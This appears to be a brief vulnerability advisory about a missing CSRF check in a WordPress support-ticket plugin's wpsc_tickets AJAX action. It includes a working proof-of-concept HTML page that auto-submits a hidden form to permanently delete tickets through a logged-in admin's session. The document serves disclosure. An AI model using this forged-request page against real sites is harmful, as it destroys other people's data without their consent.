The plugin does not have CRSF check in its wpsc_tickets AJAX action, which could allow attackers to make a logged in admin call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action.
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpsc_tickets" />
<input type="hidden" name="setting_action" value="set_delete_permanently_bulk_ticket" />
<input type="hidden" name="ticket_id" value="1" />
</form>
</body>
</html>